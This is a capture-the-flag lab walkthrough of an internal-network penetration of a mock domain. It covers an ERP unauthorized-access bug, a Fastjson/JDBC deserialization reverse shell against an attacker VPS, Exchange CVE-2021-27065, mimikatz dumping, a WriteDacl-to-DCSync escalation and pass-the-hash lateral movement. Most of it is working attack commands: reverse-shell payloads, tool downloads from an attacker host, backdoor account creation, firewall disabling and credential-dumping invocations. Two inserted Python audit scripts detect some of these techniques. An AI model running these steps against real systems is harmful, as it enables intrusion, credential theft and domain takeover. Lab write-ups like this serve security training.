0x00 Preface
Exchange is a medium-difficulty lab environment. Completing the challenge helps players learn the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The lab has 4 flags, spread across different machines.
0x01 External foothold
Once the target is in hand, start with the usual routine:
fscan version: 1.8.2
start infoscan
(icmp) Target 39.101.137.97 is alive
[*] Icmp alive hosts len is: 1
39.101.137.97:80 open
39.101.137.97:8000 open
39.101.137.97:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://39.101.137.97 code:200 len:19813 title:lumia
[*] WebTitle: http://39.101.137.97:8000 code:302 len:0 title:None 跳转url: http://39.101.137.97:8000/login.html
[*] WebTitle: http://39.101.137.97:8000/login.html code:200 len:5662 title:Lumia ERP
已完成 3/3
[*] 扫描结束,耗时: 1m1.633054679s
The scan turns up port 8000. Visiting it and searching for this ERP product quickly leads to its known vulnerabilities.
华夏ERP unauthenticated access
Visiting
/user/getAllList;.ico
returns every account together with its password MD5 hash, including the administrator's:
{"code":200,"data":{"userList":[{"id":63,"username":"季圣华","loginName":"jsh","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":1,"status":0,"description":"","remark":null,"tenantId":63},{"id":120,"username":"管理员","loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e","position":null,"department":null,"email":null,"phonenum":null,"ismanager":1,"isystem":0,"status":0,"description":null,"remark":null,"tenantId":null},{"id":131,"username":"测试用户","loginName":"test123","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":0,"status":0,"description":"","remark":null,"tenantId":63}]}}
Decode a hash and log in to the back end, but that does not get us much: the plugin-upload vulnerability does not work here.
JDBC RCE
Even without the plugin-upload RCE, we can attack via JDBC. This needs the tool MySQL_Fake_Server_master.
First edit config.json:
{
  "config":{
    "ysoserialPath":"ysoserial-all.jar",
    "javaBinPath":"java",
    "fileOutputDir":"./fileOutput/",
    "displayFileContentOnScreen":true,
    "saveToFile":true
  },
  "fileread":{
    "win_ini":"c:\\windows\\win.ini",
    "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
    "win":"c:\\windows\\",
    "linux_passwd":"/etc/passwd",
    "linux_hosts":"/etc/hosts",
    "index_php":"index.php",
    "ssrf":"https://www.baidu.com/",
    "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
  },
  "yso":{
    "Jdk7u21":["Jdk7u21","calc"],
    "CommonsCollections6":["CommonCollections6","bash -c {echo,payload}|{base64,-d}|{bash,-i}"]
  }
}
Replace payload with a reverse-shell payload.
Then run
python3 server.py
The final exp:
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "VPS-IP", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,payload}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }
Likewise replace the payload and VPS-IP with your own, and URL-encode the result. Capture a request at any query endpoint and replace the depotHead route with the user route.
Catch the reverse shell with nc on your VPS.
0x02 Internal network penetration
Internal information gathering
The usual routine: pull fscan and chisel down from the VPS.
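The JDBC attack above works only because the client is allowed to bind a Connector/J class from untrusted JSON and accept server-driven properties such as autoDeserialize and statementInterceptors. As an added defensive example (not code from the page or from any tool it names), the audit below walks a decoded JSON document and a plain JDBC URL and reports the dangerous properties and off-allowlist hosts; the deny list, the allowed hosts and the sample document are constructed for this example.

```python
import json
from urllib.parse import urlparse, parse_qs
# Connector/J properties that let a hostile MySQL server push deserialization
# or local file reads onto the client. Deny list assembled for this example.
DANGEROUS_PROPS = {
    "autodeserialize", "statementinterceptors", "queryinterceptors",
    "allowloadlocalinfile", "allowurlinlocalinfile", "allowloadlocalinfileinpath",
}
# Database hosts this deployment is allowed to connect to (assumed allowlist).
ALLOWED_DB_HOSTS = {"127.0.0.1", "db.internal.example"}

def audit_props(host, props):
    """Return findings for one connection target and its property map."""
    findings = []
    if host not in ALLOWED_DB_HOSTS:
        findings.append(f"hostToConnectTo={host!r} is not an approved database host")
    for key, value in props.items():
        if key.lower() in DANGEROUS_PROPS and str(value).lower() not in ("", "false"):
            findings.append(f"dangerous property {key}={value!r}")
        if key.lower() == "user" and str(value).startswith("yso_"):
            findings.append("user field carries a ysoserial gadget selector")
    return findings

def audit_fastjson_document(doc):
    """Walk decoded JSON and audit every object that binds a Connector/J class via @type."""
    findings = []
    def walk(node):
        if isinstance(node, dict):
            if str(node.get("@type", "")).startswith("com.mysql."):
                findings.append(f"@type {node['@type']} bound from untrusted JSON")
                findings.extend(audit_props(str(node.get("hostToConnectTo")), node.get("info", {})))
            for child in node.values(): walk(child)
        elif isinstance(node, list):
            for child in node: walk(child)
    walk(doc)
    return findings

def audit_jdbc_url(url):
    """Audit a plain jdbc:mysql://host:port/db?k=v URL, e.g. one found in a config file."""
    parsed = urlparse(url[len("jdbc:"):])
    props = {k: v[-1] for k, v in parse_qs(parsed.query).items()}
    return audit_props(parsed.hostname, props)

# Constructed sample shaped like the page's payload, with placeholder values.
SAMPLE = json.loads('{"name": {"@type": "com.mysql.jdbc.JDBC4Connection",'
    ' "hostToConnectTo": "ATTACKER-HOST", "portToConnectTo": 3306,'
    ' "info": {"user": "yso_CommonsCollections6_PLACEHOLDER", "password": "pass",'
    ' "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",'
    ' "autoDeserialize": "true", "NUM_HOSTS": "1"}}}')
```

Running audit_fastjson_document(SAMPLE) yields five findings for the sample; a clean URL such as jdbc:mysql://127.0.0.1:3306/erp?useSSL=false yields none.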
python3 -m http.server 8001
curl -o chisel http://vps:8001/chisel
curl -o fscan_amd64 http://vps:8001/fscan_amd64
chmod +x chisel
chmod +x fscan_amd64
First check the IP:
ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3e:0e:c0:cb
inet addr:172.22.3.12 Bcast:172.22.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe0e:c0cb/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:138716 errors:0 dropped:0 overruns:0 frame:0
TX packets:35423 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:179907335 (179.9 MB) TX bytes:17672898 (17.6 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:5024 errors:0 dropped:0 overruns:0 frame:0
TX packets:5024 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:1144685 (1.1 MB) TX bytes:1144685 (1.1 MB)
Then scan the internal network:
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.26 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.255.253 is alive
[*] LiveTop 172.22.0.0/16 段存活数量为: 5
[*] LiveTop 172.22.3.0/24 段存活数量为: 4
[*] Icmp alive hosts len is: 5
[*] LiveTop 172.22.255.0/24 段存活数量为: 1
172.22.3.9:139 open
172.22.3.2:445 open
172.22.3.9:445 open
172.22.3.26:445 open
172.22.3.9:443 open
172.22.3.2:139 open
172.22.3.26:139 open
172.22.3.2:135 open
172.22.3.9:135 open
172.22.3.26:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.9:808 open
172.22.3.2:88 open
172.22.3.9:8172 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]172.22.3.2
[->]XIAORANG-WIN16
[->]172.22.3.2
[*] NetInfo:
[*]172.22.3.9
[->]XIAORANG-EXC01
[->]172.22.3.9
[*] NetBios: 172.22.3.26 XIAORANG\XIAORANG-PC
[*] 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.3.26
[->]XIAORANG-PC
[->]172.22.3.26
[*] NetBios: 172.22.3.2 [+]DC XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle: http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle: https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
已完成 15/15
[*] 扫描结束,耗时: 20.604560097s
172.22.3.12 already under our control
172.22.3.2 DC
172.22.3.9 Exchange Server 2016
172.22.3.26 XIAORANG-PC
Setting up a proxy with chisel
./chisel client vps:1234 R:0.0.0.0:1080:socks
./chisel server -p 1234 --reverse
Exchange Server 2016 RCE
Visiting 172.22.3.9 shows Exchange Server 2016, which can be exploited for direct RCE with CVE-2021-27065. The prerequisite is knowing a username, which is usually administrator@domain; if it is unknown, it can be obtained via CVE-2021-26855 (SSRF).
Here the username is certainly administrator@xiaorang.lab, so use the ready-made POC directly:
proxychains4 python2 poc.py 172.22.3.9 administrator@xiaorang.lab
First add a user, then RDP in to make the later steps easier:
net user yuyulin qwer1234! /add
net localgroup administrators yuyulin /add
If remote port 3389 is not open, use the commands below:
// On the victim: allow remote access
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
// On the victim: enable port 3389
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService
// Simply turn off the firewall
netsh advfirewall set allprofiles state off
Second flag obtained.
WriteDacl to DCSync
Upload mimikatz.exe and dump user credentials:
privilege::debug
sekurlsa::logonpasswords
exit
The useful ones are these two:
Zhangtong 22c7f81993e96ac83ac2f3f1903de8b4
XIAORANG-EXC01$ d25d67d44c0e897177429cae64b7517f
Then upload SharpHound.exe:
SharpHound.exe -c all
I ran into a problem here. At first I ran it directly from cmd, but it errored out saying it could not connect to LDAP, so it could not collect anything. I then ran it as administrator, but out of several runs it only succeeded once; most of the time it just hung.
Here is someone else's complete generated graph; original link: https://exp10it.io/2023/08/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-exchange-writeup/#flag04
Locating the Exchange machine, it has WriteDacl over domain users.
WriteDacl: can write the target's DACL and modify the DACL access rights. In other words, the WriteDacl permission can be used to grant Zhangtong DCSync rights.
This requires https://github.com/ThePorgs/impacket
proxychains4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :d25d67d44c0e897177429cae64b7517f -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
But there is a pitfall here:
We need to copy msada_guids.py into the current directory and edit line 39 of dacledit.py, removing the impacket. prefix; after that it runs normally.
Dumping the domain controller hashes
proxychains4 python3 secretsdump.py xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
Then pass-the-hash gets the third flag:
proxychains4 python3 wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2 -codec gbk
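The WriteDacl step above ends with a plain user holding the two replication rights DCSync needs on the domain head. As an added defensive example (not code from the page or from impacket), the audit below parses a domain-head DACL in SDDL form, resolves common SDDL aliases, and reports principals outside an assumed trusted baseline that hold both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; the right GUIDs are the well-known schema values, while the domain SID, the trusted set and the sample DACL are constructed.

```python
import re
from collections import defaultdict
# Control-access-right GUIDs that together permit DCSync (well-known AD schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
ACE_RE = re.compile(r"\(([^)]*)\)")

def expand_sid(token, domain_sid):
    """Resolve the SDDL aliases that commonly appear in a domain-head DACL."""
    aliases = {"BA": "S-1-5-32-544", "ED": "S-1-5-9", "DA": f"{domain_sid}-512",
               "DD": f"{domain_sid}-516", "EA": f"{domain_sid}-519", "RO": f"{domain_sid}-498"}
    return aliases.get(token, token)

def replication_rights_by_sid(sddl, domain_sid):
    """Map each SID allowed a replication right to the set of right names it holds."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0] if "D:" in sddl else sddl
    grants = defaultdict(set)
    for body in ACE_RE.findall(dacl):
        f = body.split(";")
        if len(f) < 6 or f[0] not in ("A", "OA"):  # deny/audit ACEs grant nothing
            continue
        rights = {f[2][i:i + 2] for i in range(0, len(f[2]), 2)}
        obj, sid = f[3].lower(), expand_sid(f[5], domain_sid)
        if "GA" in rights or ("CR" in rights and obj == ""):  # every extended right
            grants[sid].update(REPLICATION_RIGHTS.values())
        elif "CR" in rights and obj in REPLICATION_RIGHTS:
            grants[sid].add(REPLICATION_RIGHTS[obj])
    return dict(grants)

def find_unexpected_dcsync(sddl, domain_sid, trusted_sids):
    """SIDs outside the trusted baseline holding both rights that DCSync needs."""
    needed = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
    return sorted(sid for sid, held in replication_rights_by_sid(sddl, domain_sid).items()
                  if needed <= held and sid not in trusted_sids)

# Constructed domain SID and DACL: DD and BA are baseline holders, RID 1105 is an
# ordinary user that was just granted both rights, RID 1106 holds only one of them.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_SDDL = ("O:DAG:DAD:"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1105)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1105)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1106)"
    "(A;;RPWPCRLCLOCCRCWDWOSW;;;BA)")
TRUSTED_SIDS = {"S-1-5-9", "S-1-5-32-544", f"{DOMAIN_SID}-516", f"{DOMAIN_SID}-498"}
```

On the sample, find_unexpected_dcsync reports only RID 1105; RID 1106 is not reported because Get-Changes alone is not enough to replicate secrets.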
0x03 Lateral movement in the domain
First, where the last flag is: it is not with the local administrator of 172.22.3.26; we need to log in as the lumia account.
Logging in to the domain controller
This is probably the most straightforward way. We registered an account earlier; add it to the DC's Administrators group:
net localgroup "Administrators" /add xiaorang.lab\yuyulin
Then log in to the DC with that account and change the password of the lumia account.
Now we can log in as lumia. On the desktop there is a password-protected archive secret.zip containing the last flag.
Logging in to Exchange as lumia, the mailbox contains a csv file and a hint that the password is a phone number.
The rest is simple: brute-force the archive with the phone numbers.
Lateral movement with smbexec
smbexec can also be used directly for lateral movement:
proxychains4 python3 smbexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -codec gbk
But administrator does not have the flag, so use the tool https://github.com/Jumbo-WJB/PTH_Exchange to export all of the mail and attachments:
proxychains4 python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download
The rest is the same as before, so no more detail.